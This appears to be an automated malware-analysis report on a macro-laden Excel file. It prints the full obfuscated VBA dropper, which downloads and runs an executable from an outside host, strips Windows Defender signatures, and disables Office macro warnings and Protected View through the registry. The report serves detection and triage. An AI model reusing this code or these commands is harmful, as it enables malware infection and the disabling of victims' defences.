MALICIOUS
488
Risk Score
Heuristics 10
-
ClamAV: Xls.Malware.Sload-7135989-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Sload-7135989-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Set defender = CreateObject("WScript.Shell") -
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
stream_obj.write http_obj.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set http_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("555149554E4D2F596775747073706A644E"))), StrReverse(aZqc2Fi8P(fb1m0tAyU("31"))))) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set http_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("555149554E4D2F596775747073706A644E"))), StrReverse(aZqc2Fi8P(fb1m0tAyU("31"))))) -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit" -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 18557 bytes |
SHA-256: 87154adde6595d96ea0b1760781e5aeb58c9cb03191558246950ddd14d15101a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
112 of 184 identifiers look randomly generated (e.g. 'FUZcTsUAkgUpfVkuddPezMbIaLPpebUnkHdHDOSh') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub dshsdjufdjh()
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
Dim http_obj
Dim stream_obj
Dim shell_obj
Set http_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("555149554E4D2F596775747073706A644E"))), StrReverse(aZqc2Fi8P(fb1m0tAyU("31")))))
Set stream_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("6773786B597A4834554A474A"))), StrReverse(StrReverse(aZqc2Fi8P(aZqc2Fi8P(fb1m0tAyU("36")))))))
Set shell_obj = CreateObject(kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("71716D6A33587579776E58685C"))), StrReverse(aZqc2Fi8P(fb1m0tAyU("35")))))
URL = "h" + "t" + "t" + "p" + ":" + "/" + "/" + "s" + "t" + "e" + "m" + "t" + "o" + "p" + "x" + "." + "c" + "o" + "m" + "/" + "w" + "o" + "r" + "k" + "/" + "n" + "/" + "15.exe" 'Where to download the file from
Filename = kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("816E376E3C3B7C7D51786C6575727E6B65597B7C7C6E655E4C43"))), StrReverse(StrReverse(aZqc2Fi8P(aZqc2Fi8P(fb1m0tAyU("39"))))))
RUNCMD = kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("816E376E3C3B7C7D51786C6575727E6B65597B7C7C6E655E4C43"))), StrReverse(StrReverse(aZqc2Fi8P(aZqc2Fi8P(fb1m0tAyU("39"))))))
http_obj.Open kHTIv0Qus(StrReverse(aZqc2Fi8P(fb1m0tAyU("4B5A4D"))), StrReverse(StrReverse(aZqc2Fi8P(aZqc2Fi8P(fb1m0tAyU("36")))))), URL, False
http_obj.send
stream_obj.Type = 1
stream_obj.Open
stream_obj.write http_obj.responseBody
stream_obj.savetofile Filename, 2
shell_obj.Run RUNCMD
Set defender = CreateObject("WScript.Shell")
Dim Start
Start = "cmd.exe /c cd ""%ProgramFiles%\Windows Defender"" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & exit"
defender.Run Start, vbHide
Set wso = CreateObject("WScript.Shell")
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\publisher\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
End Sub
Public Function kHTIv0Qus(W2vPrR0JL As String, bVb5dsmtB As Integer)
Dim knDHadpQC As Integer
For knDHadpQC = 1 To Len(W2vPrR0JL)
GoTo ItmtYykADGyQAfOKTKAOZHHuhIfrFnEuUIFzROmHgmiu:
jsCxbqIdwqgUUTZJCJoBAQTQOnCvfPkMRfpKYLxZvuVDUGK:
aERQhknfESLwegAdivsb = "NNpxmGlJbBcn"
GoTo LQQjgCYwplwNylvSNrtZtzwclmkpMSaERQhknfE
knfESLwegAdvsboNNpxKmG:
aERQhknfESLwegAdivsb = "NNpxmGlJbBcn"
GoTo JbBcnhziFpzFMetACLjeHJqwPYM
hxnqiGkOMujtkyIrreeFObCQBasspjByVFPVReuvQSc:
QBasDspjByVFPVReuv = "SczhJaGMgdIEE"
GoTo LhjsCxbqIdwqgLUTZJCJoBAQTQOnCvfNPkM
LQQjgCYwplwNylvSNrtZtzwclmkpMSaERQhknfE:
ziFpzFBMetACLje = "JqwPYMsonrd"
GoTo LwegAdivsboNNpxKmGlbBcnhziFpzFBMetACjeHJqwPYMsoonrdjqH
EDItmtYykADGyQAfKzTKAOZHHuhIfrFnEqUIFzROmHgmiuxL:
GKlLQQjgCYwplwNdylvS = "rtZtzGwcmkpM"
GoTo jsCxbqIdwqgUUTZJCJoBAQTQOnCvfPkMRfpKYLxZvuVDUGK
QBasDspjByVFPVRevQSczhJaGMgodI:
GoTo EDItmtYykADGyQAfKzTKAOZHHuhIfrFnEqUIFzROmHgmiuxL
fpKYLxZvuVDUGKlLQQjCYwplwNdylv:
qHihxnqiGkOMujDt = "yIreeFOb"
GoTo NrtZtzGwclmkpMSaERQ
LwegAdivsboNNpxKmGlbBcnhziFpzFBMetACjeHJqwPYMsoonrdjqH:
qHihxnqiGkOMujDt = "yIreeFOb"
GoTo hxnqiGkOMujtkyIrreeFObCQBasspjByVFPVReuvQSc
oonrdjqHihxnqikOMujDtkyIrreeFOb:
Mid(W2vPrR0JL, knDHadpQC, 1) = Chr(Asc(Mid(W2vPrR0JL, knDHadpQC, 1)) - bVb5dsmtB)
GoTo QBasDspjByVFPVRevQSczhJaGMgodI
NrtZtzGwclmkpMSaERQ:
ziFpzFBMetACLje = "JqwPYMsonrd"
GoTo knfESLwegAdvsboNNpxKmG
ItmtYykADGyQAfOKTKAOZHHuhIfrFnEuUIFzROmHgmiu:
QBasDspjByVFPVReuv = "SczhJaGMgdIEE"
GoTo fpKYLxZvuVDUGKlLQQjCYwplwNdylv
JbBcnhziFpzFMetACLjeHJqwPYM:
GKlLQQjgCYwplwNdylvS = "rtZtzGwcmkpM"
GoTo oonrdjqHihxnqikOMujDtkyIrreeFOb
LhjsCxbqIdwqgLUTZJCJoBAQTQOnCvfNPkM:
Next knDHadpQC
GoTo hIfrFnEquUIFzRmHgmiuxLhjsCxbqIdw:
hIfrFnEquUIFzRmHgmiuxLhjsCxbqIdw:
JaGMgodIEEDItmt = "ykADGyQAfOzTKAOZHH"
GoTo QOnCvfNPkMRfpKYLxZv
VDUGKlLQQjgCYwlwNdylvSNrtZt:
ERQhknfESLwegAdvsboNNpxKmGlJbB = "nhiFpzFBetACLjeH"
GoTo GwclmkpMSaERQhkfESLwegAdivs
vQSczhJaGMgodIEDItmtYykADGyQAf:
CvfNPkMRfpKYLxZv = "VDUGKLQQgCY"
GoTo KzTKAOZHHuhIfrFnEqUIFzROmHgmiuxLjsCxbqIdwqg
QOnCvfNPkMRfpKYLxZv:
qwPYMsoonrdjqHihxnqGkOMujDtkyIrree = "ObCQBasspjByVFVReuvQScz"
GoTo VDUGKlLQQjgCYwlwNdylvSNrtZt
KzTKAOZHHuhIfrFnEqUIFzROmHgmiuxLjsCxbqIdwqg:
plwNdylvSNrtZtzGw = "lmpMS"
GoTo UUTZJCJoBAQTQOnCvfPkMRfpKYLxZvuVDUGKLQQjgCYwplwN
UUTZJCJoBAQTQOnCvfPkMRfpKYLxZvuVDUGKLQQjgCYwplwN:
ERQhknfESLwegAdvsboNNpxKmGlJbB = "nhiFpzFBetACLjeH"
GoTo ylvSNrtZtzwclmkpMSaERQhknfELwegAdivsboNNpxKmGlbBcnhziFpzFBMetAC
jeHJqwPYMsoonrdjqHhxnqiGkOMujtkyIrreeFObCQBasspjByVFPVReuvQSc:
JaGMgodIEEDItmt = "ykADGyQAfOzTKAOZHH"
GoTo gLUUTZJCJoBAQ
ylvSNrtZtzwclmkpMSaERQhknfELwegAdivsboNNpxKmGlbBcnhziFpzFBMetAC:
qwPYMsoonrdjqHihxnqGkOMujDtkyIrree = "ObCQBasspjByVFVReuvQScz"
GoTo jeHJqwPYMsoonrdjqHhxnqiGkOMujtkyIrreeFObCQBasspjByVFPVReuvQSc
oNNpxKmGlJBcnhziFpzF:
CvfNPkMRfpKYLxZv = "VDUGKLQQgCY"
GoTo MetACLjeHJqwPYMoonrdjqHihxnqi
GwclmkpMSaERQhkfESLwegAdivs:
plwNdylvSNrtZtzGw = "lmpMS"
GoTo oNNpxKmGlJBcnhziFpzF
MetACLjeHJqwPYMoonrdjqHihxnqi:
kHTIv0Qus = W2vPrR0JL
GoTo kOMujDtkyIrreeFObQBasDspjByVFPVRe
kOMujDtkyIrreeFObQBasDspjByVFPVRe:
GoTo vQSczhJaGMgodIEDItmtYykADGyQAf
gLUUTZJCJoBAQ:
End Function
Public Function aZqc2Fi8P(EeCKcay1n As String) As String
Dim bVb5dsmtB As Variant
For bVb5dsmtB = 1 To Len(EeCKcay1n) Step 2
GoTo UrbmrnzQfnox:
bZeOVdtTTjcTtVAygUpgkvedQQsAMpIoLeqecVol:
GoTo rCHEPhiDENmSwLsyRPvqrpufYgJVmqskJmQBxlF
cTtVAygUpgkvedQQsAMpIoLeqecVolrCHEPhiDENmSwLsyR:
pHtxQxICURoKjbQjzOk = "hEzdfLgltjQYVbyFMrD"
GoTo PvqrpufYgJVmqskJmQBxlFnBLuthTuQdsZqd
xICURoKjbQjzOkYhEzdfgltjOQYVbyFMrDDSQa:
pHtxQxICURoKjbQjzOk = "hEzdfLgltjQYVbyFMrD"
GoTo qFyiPSnPTieNbAAckwZYvNnNZSlUrbmrnQfnoxVPtvciBJzfbZeOVdtTTj
qFyiPSnPTieNbAAckwZYvNnNZSlUrbmrnQfnoxVPtvciBJzfbZeOVdtTTj:
SQaQqFyiPSnPTieNbA = "ckwZsYNnNZS"
GoTo PtvciBJzfabZeOVdtTTj
mCGJAaphRzBQDRcwKxkKhgIpHtxxICURoKjbQjzOkYhEzdf:
mSwLsyRaPvqrpufYgJl = "mqskJmQBxlwnBLuth"
GoTo gltjOQYVbyFMrDDSQaqFyiPSnPTieNbAAckwZYvNnNZSlUrbmrnQfnoxVPtvciBJzf
dRyGHFKvpwamCGJAaphRzBQDRcwKxkKhgIpHtx:
cvPidRyGHFKvpwanmCG = "AaphRzBQDRcwKxKhg"
GoTo xICURoKjbQjzOkYhEzdfgltjOQYVbyFMrDDSQa
nBLuthTuQdsZqdGusmEBYuSZUjyTUfojMcvP:
uQdsZqdhGusmEBYuSZUg = "yTUoj"
GoTo dRyGHFKvpwamCGJAaphRzBQDRcwKxkKhgIpHtx
rCHEPhiDENmSwLsyRPvqrpufYgJVmqskJmQBxlF:
mSwLsyRaPvqrpufYgJl = "mqskJmQBxlwnBLuth"
GoTo nBLuthTuQdsZqdGusmEBYuSZUjyTUfojMcvP
PvqrpufYgJVmqskJmQBxlFnBLuthTuQdsZqd:
cvPidRyGHFKvpwanmCG = "AaphRzBQDRcwKxKhg"
GoTo GusmEBYuSZUjyTUfojMcvPdRyGHFKvpwa
GusmEBYuSZUjyTUfojMcvPdRyGHFKvpwa:
uQdsZqdhGusmEBYuSZUg = "yTUoj"
GoTo mCGJAaphRzBQDRcwKxkKhgIpHtxxICURoKjbQjzOkYhEzdf
gltjOQYVbyFMrDDSQaqFyiPSnPTieNbAAckwZYvNnNZSlUrbmrnQfnoxVPtvciBJzf:
aZqc2Fi8P = aZqc2Fi8P & StrReverse(Mid(EeCKcay1n, bVb5dsmtB, 2))
GoTo bZeOVdtTTjcTtVAygUpgkvedQQsAMpIoLeqecVol
UrbmrnzQfnox:
SQaQqFyiPSnPTieNbA = "ckwZsYNnNZS"
GoTo cTtVAygUpgkvedQQsAMpIoLeqecVolrCHEPhiDENmSwLsyR
PtvciBJzfabZeOVdtTTj:
DoEvents
Next bVb5dsmtB
End Function
Public Function fb1m0tAyU(ByVal xU56UzmMC As String)
Dim bVb5dsmtB As Long, HfGzi82RI As String, P35pljJqE As String
On Local Error Resume Next
For bVb5dsmtB = 1 To Len(xU56UzmMC) Step 2
GoTo lpskIYQAilFimAKgtgSu:
VyCQNwJjjKSfHbG:
izNVQhEzdeKRksiNIJHMELcDCSILCcEkhPDZO = "TeMMzzbwYrvMZNKEQTqa"
GoTo wQwHBTDaJUbizNVQhEzdeKRksiNIJHMELcDCSILCcEkhPD
eZaYdOHOtTFUZcT:
HfGzi82RI = HfGzi82RI & Chr$(Val("&H" & Mid$(xU56UzmMC, bVb5dsmtB, 2)))
GoTo UAkgUpfVkuddPezMbIaLPpebUnkHdHDOShCENYRvLeyRBhqqptfYfJVVlpskIY
lpskIYQAilFimAKgtgSu:
uddPCezMbIaLPpebnkHdBHDOShCENYRvLeyR = "BhqqptfYJV"
GoTo SGPojLNuOTcRxGGKhovanmCFIAZohQz
OFTeMMzzbjwYrQvMZNKETqalrnyPQmnxUBfvbiBI:
gSuQOrZqcgFgrlDAYRJGRjxSGPojLNuOTc = "xGGFKhovamCFI"
GoTo eZaYdOHOtTFUZcT
jxSGPojLNuOTcRxGGFKovanmCFIAZoQzBVyCQNwJj:
ZohQzBVyCQNwJjjKSf = "bGfwQwHTDaJUb"
GoTo KSfHbGfwQwHBDaJUbQizNVQhEzdeKRkiNIJHMxELcDCSI
CcEkhPDZOFTeMMzzbwYrQvMZNKEQTalrnyPQmnxUBfbiBIyeZaYdOHOt:
rnyPQmnxUBfvbiBI = "eZaYdOOtTFUZcsUAkgUpfV"
GoTo FUZcTsUAkgUpfVkuddPezMbIaLPpebUnkHdHDOShCENYRvLeyRBhqqptfYfJVVlpskIY
wQwHBTDaJUbizNVQhEzdeKRksiNIJHMELcDCSILCcEkhPD:
ZohQzBVyCQNwJjjKSf = "bGfwQwHTDaJUb"
GoTo OFTeMMzzbjwYrQvMZNKETqalrnyPQmnxUBfvbiBI
UAkgUpfVkuddPezMbIaLPpebUnkHdHDOShCENYRvLeyRBhqqptfYfJVVlpskIY:
GoTo AilFimAKgtgSuQOrZqcFgrlDAYtRJG
KSfHbGfwQwHBDaJUbQizNVQhEzdeKRkiNIJHMxELcDCSI:
izNVQhEzdeKRksiNIJHMELcDCSILCcEkhPDZO = "TeMMzzbwYrvMZNKEQTqa"
GoTo CcEkhPDZOFTeMMzzbwYrQvMZNKEQTalrnyPQmnxUBfbiBIyeZaYdOHOt
AilFimAKgtgSuQOrZqcFgrlDAYtRJG:
gSuQOrZqcgFgrlDAYRJGRjxSGPojLNuOTc = "xGGFKhovamCFI"
GoTo jxSGPojLNuOTcRxGGFKovanmCFIAZoQzBVyCQNwJj
FUZcTsUAkgUpfVkuddPezMbIaLPpebUnkHdHDOShCENYRvLeyRBhqqptfYfJVVlpskIY:
uddPCezMbIaLPpebnkHdBHDOShCENYRvLeyR = "BhqqptfYJV"
GoTo OrZqcgFgrlDAYtRJGRj
SGPojLNuOTcRxGGKhovanmCFIAZohQz:
rnyPQmnxUBfvbiBI = "eZaYdOOtTFUZcsUAkgUpfV"
GoTo VyCQNwJjjKSfHbG
OrZqcgFgrlDAYtRJGRj:
Next bVb5dsmtB
GoTo AilFimAKgtgSuQOrZqcFgrlDAYtRJGjxSGPojLNuOTcRxGGFKovanmCFIAZo:
DQfTAvvuzkryOpo:
tTFUZcTsUAkgUpfVkud = "PCzM"
GoTo uxpNrVTBqKBsFPyy
mMViKeJhzLzw:
MxELcDCSILCcEkhPDZ = "FTeMMzzbjYrQvM"
GoTo IGdMQdZlBCYaj
oRhNTnvlQLLKPAtAf:
fb1m0tAyU = HfGzi82RI
GoTo rHKNFeHmQRGbRIVg
cdbgQJQvIHYceVvKCnU:
NKEQTqalrnyPQmnxUBfv = "iByeZaYdOH"
GoTo rTZmxRfSEgCBdKcNRsSe
uxpNrVTBqKBsFPyy:
NKEQTqalrnyPQmnxUBfv = "iByeZaYdOH"
GoTo mMViKeJhzLzw
rHKNFeHmQRGbRIVg:
GoTo OCoPmyMuLxBcPNHaQt
otpBETpqzJEixQkDyn:
MxELcDCSILCcEkhPDZ = "FTeMMzzbjYrQvM"
GoTo cdbgQJQvIHYceVvKCnU
OCoPmyMuLxBcPNHaQt:
hQzBVyCQNwJjjKSfbGfwQwHBTDaJUbQizN = "QhEzdeKRksNIJ"
GoTo otpBETpqzJEixQkDyn
IGdMQdZlBCYaj:
hQzBVyCQNwJjjKSfbGfwQwHBTDaJUbQizN = "QhEzdeKRksNIJ"
GoTo oRhNTnvlQLLKPAtAf
rTZmxRfSEgCBdKcNRsSe:
tTFUZcTsUAkgUpfVkud = "PCzM"
GoTo qnJgEwsEUkFtCaUyAhAG
qnJgEwsEUkFtCaUyAhAG:
IaLPpebUnkHdBHDShCENYRvLeyRLBhqqpt = "YfVVlpskIY"
GoTo QzBVyCQNwJjKSfHbGfwQwHBpMwGMIUlAHJSqlOQ
AilFimAKgtgSuQOrZqcFgrlDAYtRJGjxSGPojLNuOTcRxGGFKovanmCFIAZo:
IaLPpebUnkHdBHDShCENYRvLeyRLBhqqpt = "YfVVlpskIY"
GoTo DQfTAvvuzkryOpo
QzBVyCQNwJjKSfHbGfwQwHBpMwGMIUlAHJSqlOQ:
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 67584 bytes |
SHA-256: 676439d62b2f02978b9bce580ecf4f3fff58f07241db4b857c59e9f9cc0c3390 |
|||
|
Detection
ClamAV:
Xls.Malware.Sload-7135989-0
Obfuscation or payload:
likely
266 of 445 identifiers look randomly generated (e.g. 'FUZcTsUAkgUpfVkuddPezMbIaLPpebUnkHdHDOSh') — consistent with name-mangling obfuscation.
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.